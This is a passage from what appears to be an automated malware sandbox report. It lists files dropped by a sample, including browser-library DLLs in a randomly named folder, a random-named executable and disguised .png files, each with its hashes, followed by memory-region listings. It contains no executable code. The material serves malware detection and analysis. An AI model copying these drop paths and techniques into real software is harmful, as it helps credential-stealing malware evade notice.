                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                    SHA256

                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                    SHA512

                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\h2niipx3\CSC22AB542D93C545F48A70C4EFE97B3FE4.TMP
                                                                                    MD5

                                                                                    719d1569947465bad2da8193fdd311ae

                                                                                    SHA1

                                                                                    72a258a62aa1eab30a17a37b62db55b199a3ba0f

                                                                                    SHA256

                                                                                    508f77a0849c040d084324eed1b4d535f751ec4e7a11968dfcec2d6c3eeb8c00

                                                                                    SHA512

                                                                                    5b9f83f8b55483c260620e3284e30d91e1d84e46f9a7f07dbfc8aa2566aae2152170973d4da7dd3998fed759a643348b33b64e1ce227ce4c8d57d7e372f25a23

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\h2niipx3\h2niipx3.0.cs
                                                                                    MD5

                                                                                    df390bc8a088b51d27253fed32186361

                                                                                    SHA1

                                                                                    69e6a59300fc04ef5ab53cbe061b8b2aefe375a4

                                                                                    SHA256

                                                                                    4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f

                                                                                    SHA512

                                                                                    4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\h2niipx3\h2niipx3.cmdline
                                                                                    MD5

                                                                                    4c9818657988cef870cf7da46f70120f

                                                                                    SHA1

                                                                                    7575d3c936da05232a021e4fea123bbb08cdd537

                                                                                    SHA256

                                                                                    2659a47793610dae00603d0287a1bd68fe4a44ce139d05042a5456e6bba65225

                                                                                    SHA512

                                                                                    4c66618a65d76b4e43ccd1bdab3ff9dda9141c376a6d02e2f667520665ada4165dfea4f07156a45a9970e5f2dd6dd77efc2bcf5fb2d0e22c0e41ae29755719ba

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                                                    MD5

                                                                                    60acd24430204ad2dc7f148b8cfe9bdc

                                                                                    SHA1

                                                                                    989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                                                    SHA256

                                                                                    9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                                                    SHA512

                                                                                    626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                                                    MD5

                                                                                    60acd24430204ad2dc7f148b8cfe9bdc

                                                                                    SHA1

                                                                                    989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                                                    SHA256

                                                                                    9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                                                    SHA512

                                                                                    626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
                                                                                    MD5

                                                                                    eae9273f8cdcf9321c6c37c244773139

                                                                                    SHA1

                                                                                    8378e2a2f3635574c106eea8419b5eb00b8489b0

                                                                                    SHA256

                                                                                    a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                                                                                    SHA512

                                                                                    06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
                                                                                    MD5

                                                                                    109f0f02fd37c84bfc7508d4227d7ed5

                                                                                    SHA1

                                                                                    ef7420141bb15ac334d3964082361a460bfdb975

                                                                                    SHA256

                                                                                    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                    SHA512

                                                                                    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
                                                                                    MD5

                                                                                    02cc7b8ee30056d5912de54f1bdfc219

                                                                                    SHA1

                                                                                    a6923da95705fb81e368ae48f93d28522ef552fb

                                                                                    SHA256

                                                                                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                                                                                    SHA512

                                                                                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
                                                                                    MD5

                                                                                    4e8df049f3459fa94ab6ad387f3561ac

                                                                                    SHA1

                                                                                    06ed392bc29ad9d5fc05ee254c2625fd65925114

                                                                                    SHA256

                                                                                    25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                                                                                    SHA512

                                                                                    3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
                                                                                    MD5

                                                                                    7587bf9cb4147022cd5681b015183046

                                                                                    SHA1

                                                                                    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                    SHA256

                                                                                    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                    SHA512

                                                                                    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                                                    MD5

                                                                                    f964811b68f9f1487c2b41e1aef576ce

                                                                                    SHA1

                                                                                    b423959793f14b1416bc3b7051bed58a1034025f

                                                                                    SHA256

                                                                                    83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                                                    SHA512

                                                                                    565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                                                  • \Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • \Users\Admin\AppData\Local\Temp\QyeaZkZMby.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • \Windows\Branding\mediasrv.png
                                                                                    MD5

                                                                                    1da8e368cb917044f7440a54d79f6737

                                                                                    SHA1

                                                                                    df60dd7011bc948f3b871b1a6cb149a7028c1a85

                                                                                    SHA256

                                                                                    dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4

                                                                                    SHA512

                                                                                    8437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92

                                                                                  • \Windows\Branding\mediasvc.png
                                                                                    MD5

                                                                                    009e8b6a916836a4a8aa2be3229276a1

                                                                                    SHA1

                                                                                    28f3892fb8b63e7299dce25cb65bf252e29d5afd

                                                                                    SHA256

                                                                                    39ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7

                                                                                    SHA512

                                                                                    a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc

                                                                                  • memory/108-206-0x0000000000000000-mapping.dmp
                                                                                  • memory/108-212-0x0000000000000000-mapping.dmp
                                                                                  • memory/316-93-0x0000000000000000-mapping.dmp
                                                                                  • memory/368-209-0x0000000000000000-mapping.dmp
                                                                                  • memory/488-194-0x0000000000000000-mapping.dmp
                                                                                  • memory/520-227-0x0000000000000000-mapping.dmp
                                                                                  • memory/540-211-0x0000000000000000-mapping.dmp
                                                                                  • memory/540-205-0x0000000000000000-mapping.dmp
                                                                                  • memory/584-183-0x0000000000000000-mapping.dmp
                                                                                  • memory/684-177-0x0000000000000000-mapping.dmp
                                                                                  • memory/684-207-0x0000000000000000-mapping.dmp
                                                                                  • memory/752-189-0x0000000000000000-mapping.dmp
                                                                                  • memory/868-217-0x0000000000000000-mapping.dmp
                                                                                  • memory/868-223-0x00000000010DA000-0x00000000010F9000-memory.dmp
                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/868-204-0x0000000000000000-mapping.dmp
                                                                                  • memory/868-210-0x0000000000000000-mapping.dmp
                                                                                  • memory/868-221-0x00000000010D0000-0x00000000010D2000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/868-222-0x00000000010D4000-0x00000000010D6000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/888-187-0x0000000000000000-mapping.dmp
                                                                                  • memory/952-185-0x0000000000000000-mapping.dmp
                                                                                  • memory/968-228-0x0000000000000000-mapping.dmp
                                                                                  • memory/1012-195-0x0000000000000000-mapping.dmp
                                                                                  • memory/1012-173-0x000000001AC94000-0x000000001AC96000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1012-172-0x000000001AC90000-0x000000001AC92000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1012-160-0x0000000000000000-mapping.dmp
                                                                                  • memory/1028-196-0x0000000000000000-mapping.dmp
                                                                                  • memory/1068-76-0x0000000000000000-mapping.dmp
                                                                                  • memory/1068-181-0x0000000000000000-mapping.dmp
                                                                                  • memory/1084-193-0x0000000000000000-mapping.dmp
                                                                                  • memory/1100-179-0x0000000000000000-mapping.dmp
                                                                                  • memory/1108-182-0x0000000000000000-mapping.dmp
                                                                                  • memory/1112-202-0x0000000000000000-mapping.dmp
                                                                                  • memory/1112-208-0x0000000000000000-mapping.dmp
                                                                                  • memory/1120-96-0x0000000000000000-mapping.dmp
                                                                                  • memory/1176-213-0x0000000000000000-mapping.dmp
                                                                                  • memory/1324-145-0x000000001ABF0000-0x000000001ABF2000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1324-151-0x000000001B520000-0x000000001B521000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1324-149-0x000000001B7E0000-0x000000001B7E1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1324-147-0x0000000002570000-0x0000000002571000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1324-152-0x00000000022B0000-0x00000000022B1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1324-139-0x0000000000000000-mapping.dmp
                                                                                  • memory/1324-146-0x000000001ABF4000-0x000000001ABF6000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1388-184-0x0000000000000000-mapping.dmp
                                                                                  • memory/1484-79-0x0000000041012000-0x0000000041014000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1484-82-0x0000000041017000-0x0000000041018000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1484-81-0x0000000041016000-0x0000000041017000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1484-80-0x0000000041014000-0x0000000041016000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1484-73-0x0000000000000000-mapping.dmp
                                                                                  • memory/1484-77-0x00000000416C0000-0x0000000041AE1000-memory.dmp
                                                                                    Filesize

                                                                                    4.1MB

                                                                                  • memory/1536-224-0x0000000000000000-mapping.dmp
                                                                                  • memory/1548-85-0x0000000002420000-0x0000000002421000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-102-0x000000001B550000-0x000000001B551000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-83-0x0000000000000000-mapping.dmp
                                                                                  • memory/1548-104-0x000000001A9F0000-0x000000001A9F1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-84-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1548-103-0x000000001B740000-0x000000001B741000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-89-0x000000001A970000-0x000000001A972000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1548-90-0x000000001A974000-0x000000001A976000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1548-113-0x000000001A97A000-0x000000001A999000-memory.dmp
                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/1548-86-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-100-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-87-0x0000000002370000-0x0000000002371000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-92-0x000000001C180000-0x000000001C181000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-88-0x0000000002790000-0x0000000002791000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1548-176-0x000000001C780000-0x000000001C781000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1568-190-0x0000000000000000-mapping.dmp
                                                                                  • memory/1584-203-0x0000000000000000-mapping.dmp
                                                                                  • memory/1584-216-0x0000000000000000-mapping.dmp
                                                                                  • memory/1592-198-0x0000000000000000-mapping.dmp
                                                                                  • memory/1596-188-0x0000000000000000-mapping.dmp
                                                                                  • memory/1612-62-0x0000000000400000-0x0000000000496000-memory.dmp
                                                                                    Filesize

                                                                                    600KB

                                                                                  • memory/1612-61-0x0000000000220000-0x00000000002B1000-memory.dmp
                                                                                    Filesize

                                                                                    580KB

                                                                                  • memory/1612-60-0x0000000075D51000-0x0000000075D53000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1620-180-0x0000000000000000-mapping.dmp
                                                                                  • memory/1636-192-0x0000000000000000-mapping.dmp
                                                                                  • memory/1696-214-0x0000000000000000-mapping.dmp
                                                                                  • memory/1708-186-0x0000000000000000-mapping.dmp
                                                                                  • memory/1740-215-0x0000000000000000-mapping.dmp
                                                                                  • memory/1760-199-0x0000000000000000-mapping.dmp
                                                                                  • memory/1760-75-0x0000000000000000-mapping.dmp
                                                                                  • memory/1824-197-0x0000000000000000-mapping.dmp
                                                                                  • memory/1824-225-0x0000000000000000-mapping.dmp
                                                                                  • memory/2044-119-0x0000000002430000-0x0000000002431000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-118-0x000000001AC50000-0x000000001AC51000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-114-0x00000000024F0000-0x00000000024F1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-124-0x000000001ACA0000-0x000000001ACA1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-105-0x0000000000000000-mapping.dmp
                                                                                  • memory/2044-137-0x000000001B6E0000-0x000000001B6E1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-111-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/2044-138-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-116-0x00000000025B0000-0x00000000025B1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2044-112-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
                                                                                    Filesize

                                                                                    8KB